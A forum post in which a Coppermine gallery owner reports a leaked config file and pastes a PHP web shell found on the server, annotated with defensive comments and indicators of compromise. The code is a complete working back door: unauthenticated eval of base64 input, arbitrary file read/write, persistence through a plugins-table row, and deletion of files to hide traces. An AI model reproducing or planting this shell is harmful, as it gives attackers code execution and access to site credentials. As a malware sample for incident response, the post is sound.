Hi guys!
I just realised something shocking:
I found in the copper/album directory a txt file which is an exact copy of my config.inc.php file. That means the passwords are easily readable by the whole world. I've never seen this file before...
There are 2 other unknown files in this directory. One of them is a PHP file which contains the code listed at the end of this topic.
Do you have any idea what this is?
Thank you in advance!
<?
// Web shell found in a Coppermine gallery directory (see the post above).
// Four branches, each triggered by a GET parameter: "ch" (liveness marker),
// "patch" (installs a persistent back door via the gallery's plugins table and
// wipes this directory), "eval" (arbitrary PHP execution) and "up" (arbitrary
// file read/write). Treat the host as compromised: rotate every credential in
// config.inc.php, remove the files named below and the "Sumple Plugin" row
// from the plugins table, and search the access logs for these parameters.
$hash="b269fc....5a1623ec7fad79df17";
// Shared secret (value elided in the post). It is written into the dropped
// userpics/codebase.php as the POST "hash" gate and also exempts files whose
// name matches it from the deletion loop in the "patch" branch.
if(isset($_GET["ch"])){
// Liveness check: "?ch" returns a fixed marker string. A request for this
// script with "ch" in the query string is a useful log-search indicator.
echo "oke";
echo "eff0";
}
if(isset($_GET["patch"])){
// Persistence stage. Reuses the gallery's own config to reach the database,
// so no credentials need to be carried in this file.
include("../include/config.inc.php");
mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
mysql_select_db($CONFIG["dbname"]);
//phpinfo();
// Source of the file that will be written to userpics/codebase.php. It is a
// single-quoted string, so the hash literal inside it is a placeholder until
// the str_replace below swaps in the real value. The dropped code calls die()
// on picEditor requests, save=1 posts and posts carrying "_REQUEST" unless the
// POST "hash" matches — presumably a gate so only the holder of the secret gets
// through (eregi/$REQUEST_URI are pre-PHP-5.3 era constructs).
$codebase_str='<?php
$hash="b269fcfd....23ec7fad79df17";
if(eregi("picEditor", $REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
if(($_POST["hash"]!=$hash)){
die("");
}
}
?>';
$codebase_str=str_replace("b269fcfd8...23ec7fad79df17", $hash, $codebase_str);
// Indicator of compromise: userpics/codebase.php. The handle is never
// fclose()d here; PHP flushes it at script end.
$fp_codebase=fopen("userpics/codebase.php", "w");
fwrite($fp_codebase, $codebase_str);
// Greedy "(.*)" followed by "\/" and a lazy "(.*?)" that matches nothing, so
// $ok[0] is this script's directory including the trailing slash.
$path=__FILE__;
preg_match("/(.*)(\/.*?)/", $path, $ok);
$path=$ok[0];
// Plugin path pointing at the userpics directory. The long "/../" prefix is
// presumably there to climb to the filesystem root from wherever the gallery
// resolves plugin paths — TODO confirm against the plugin loader.
$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
//echo $mysql_path."\n";
// Persistence via the plugins table: a row named "Sumple Plugin" whose path is
// the userpics directory. Its presence in `<prefix>plugins` is a second
// indicator; note the path is concatenated into the SQL, not parameterised.
$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
VALUES (
'', 'Sumple Plugin', '$mysql_path', '0'
);";
//echo $sql;
mysql_query($sql);
echo mysql_error();
// Anti-forensics: deletes every regular file in the current directory except
// index.php and any file whose name matches $hash (eregi), then leaves an
// empty index.php behind. Anything removed here is only recoverable from
// backups or disk-level forensics.
if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) {
if(is_file($file)){
unlink($file);
}
}
}
$fp=fopen("index.php", "w");
fclose($fp);
closedir($handle);
}
}
if(isset($_GET["eval"])){
// Remote code execution: the "eval" query parameter is base64-decoded and run
// as PHP with no authentication. Any request carrying an "eval" parameter in
// the access logs should be treated as attacker activity.
eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
// Arbitrary file copy: reads the file named by "up_name" and writes its
// contents to "down_name", both caller-controlled. This is plausibly how a
// plaintext copy of config.inc.php ended up in the album directory (inferred
// from the post, not from this code). file() can also fetch URLs when
// allow_url_fopen is enabled — verify the server setting.
$fp=implode(file($_GET["up_name"]));
$fp_out=fopen($_GET["down_name"], "w");
fwrite($fp_out, $fp);
}
?>